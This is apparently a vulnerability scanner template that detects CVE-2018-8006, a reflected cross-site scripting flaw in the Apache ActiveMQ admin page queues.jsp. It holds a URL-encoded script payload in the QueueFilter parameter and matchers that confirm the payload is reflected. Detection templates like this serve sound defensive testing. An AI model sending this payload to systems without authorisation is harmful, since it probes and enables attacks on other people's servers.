id: CVE-2018-8006

info:
  name: Apache ActiveMQ XSS
  author: pdteam
  severity: medium
  tags: cve,cve2018,apache,activemq,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"><script>alert("1")</script>'
      - type: word
        words:
          - "/html"
        part: header